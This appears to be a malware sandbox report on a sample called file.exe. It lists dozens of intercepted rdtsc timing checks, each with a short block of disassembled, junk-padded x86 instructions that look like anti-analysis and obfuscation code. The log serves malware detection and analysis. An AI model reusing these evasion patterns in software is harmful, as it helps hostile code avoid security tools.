Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA126 second address: 5DA143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7539h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA143 second address: 5DA14D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA14D second address: 5DA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E5F0 second address: 62E658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2557h], edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6E64DC24B8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov bl, dh 0x0000002d movsx edi, si 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F6E64DC24B8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c adc ebx, 00CD023Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F540 second address: 62F545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F545 second address: 62F555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A6DD second address: 62A6E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F555 second address: 62F55B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A6E1 second address: 62A6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F6E644F7526h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A6EF second address: 62A705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F6E64DC24BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6337FA second address: 633805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F66C second address: 62F715 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D3240h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F6E64DC24B8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D2987h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007F6E64DC24B8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 mov ebx, dword ptr [ebp+122D57B3h] 0x0000005f mov eax, dword ptr [ebp+122D0B5Dh] 0x00000065 mov bx, 3634h 0x00000069 push FFFFFFFFh 0x0000006b or bx, 93FEh 0x00000070 nop 0x00000071 jg 00007F6E64DC24C5h 0x00000077 push ecx 0x00000078 jmp 00007F6E64DC24BDh 0x0000007d pop ecx 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 jmp 00007F6E64DC24C3h 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6307A1 second address: 6307B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F715 second address: 62F73F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24BEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6307B7 second address: 6307C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633E4C second address: 633EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jbe 00007F6E64DC24B6h 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F6E64DC24B8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov di, 6D90h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F6E64DC24B8h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1B37h], edi 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D5826h], ecx 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633EB4 second address: 633EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633EB8 second address: 633EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634F90 second address: 634F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634F94 second address: 634F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634F9A second address: 63500A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F6E644F7537h 0x0000000f nop 0x00000010 xor edi, dword ptr [ebp+122D2C1Dh] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 mov di, BE5Bh 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F6E644F7528h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a call 00007F6E644F752Ch 0x0000003f mov ebx, 5BF8D370h 0x00000044 pop edi 0x00000045 mov bx, cx 0x00000048 push eax 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jng 00007F6E644F7526h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636231 second address: 63623F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6E64DC24BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63A24E second address: 63A254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63A254 second address: 63A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B324 second address: 63B329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B329 second address: 63B344 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24BCh 0x00000008 jns 00007F6E64DC24B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F6E64DC24B8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B344 second address: 63B349 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B3D1 second address: 63B3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E386 second address: 63E38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E38A second address: 63E390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638210 second address: 638216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E5B2 second address: 63E5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648A4F second address: 648A65 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6E644F7526h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F6E644F7526h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648A65 second address: 648A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0CB3 second address: 5E0CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0CB9 second address: 5E0CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F6E64DC24CEh 0x0000000b jmp 00007F6E64DC24C8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648175 second address: 648179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6482D4 second address: 6482E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F6E64DC24B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648447 second address: 648451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648594 second address: 6485BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24C6h 0x00000009 jnl 00007F6E64DC24B6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F6E64DC24B6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7B7 second address: 5EC7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Dh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7CC second address: 5EC7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7D1 second address: 5EC7FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7533h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E644F7536h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7FE second address: 5EC802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92E0 second address: 5E92E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92E4 second address: 5E92E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92E9 second address: 5E92EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92EF second address: 5E92F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653A8C second address: 653A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 ja 00007F6E644F7526h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653A99 second address: 653AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F6E64DC24B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653AA6 second address: 653AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653AAA second address: 653ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6E64DC24C7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653ACD second address: 653AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7532h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653AE5 second address: 653AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653DF1 second address: 653E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E644F7530h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653E0C second address: 653E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654211 second address: 654242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 jmp 00007F6E644F7536h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654242 second address: 654268 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E64DC24C7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F6E64DC24B6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658AA9 second address: 658AB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658AB7 second address: 658AC1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E64DC24B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658AC1 second address: 658AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658D9D second address: 658DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658ED0 second address: 658EDA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 659314 second address: 65931A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65931A second address: 65931E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65931E second address: 659350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F6E64DC24B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6E64DC24BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E64DC24C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6594EB second address: 6594F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F6E644F7526h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6597C2 second address: 6597C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664C00 second address: 664C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6E644F7526h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664C0F second address: 664C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664C13 second address: 664C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C7A1 second address: 62C7B3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C7B3 second address: 62C7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C7B7 second address: 62C7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C7BD second address: 62C7C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CA02 second address: 62CA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CB7F second address: 62CB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CB83 second address: 62CBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F6E64DC24BDh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CBA1 second address: 62CBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CBA5 second address: 62CBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6E64DC24C6h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CBCD second address: 62CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CBD1 second address: 62CC5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F6E64DC24C0h 0x00000010 pop eax 0x00000011 adc ecx, 771EB81Eh 0x00000017 mov edx, dword ptr [ebp+122D2C25h] 0x0000001d call 00007F6E64DC24B9h 0x00000022 pushad 0x00000023 jp 00007F6E64DC24BCh 0x00000029 jns 00007F6E64DC24BCh 0x0000002f popad 0x00000030 push eax 0x00000031 pushad 0x00000032 push ecx 0x00000033 jo 00007F6E64DC24B6h 0x00000039 pop ecx 0x0000003a jg 00007F6E64DC24B8h 0x00000040 popad 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 jmp 00007F6E64DC24C0h 0x0000004a mov eax, dword ptr [eax] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6E64DC24C4h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC5D second address: 62CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC63 second address: 62CC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jl 00007F6E64DC24B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC89 second address: 62CC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC92 second address: 62CC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CE72 second address: 62CEB3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 jbe 00007F6E644F7526h 0x00000018 jmp 00007F6E644F752Bh 0x0000001d popad 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 xor edx, dword ptr [ebp+122D2470h] 0x00000026 nop 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F6E644F7530h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D933 second address: 62D939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
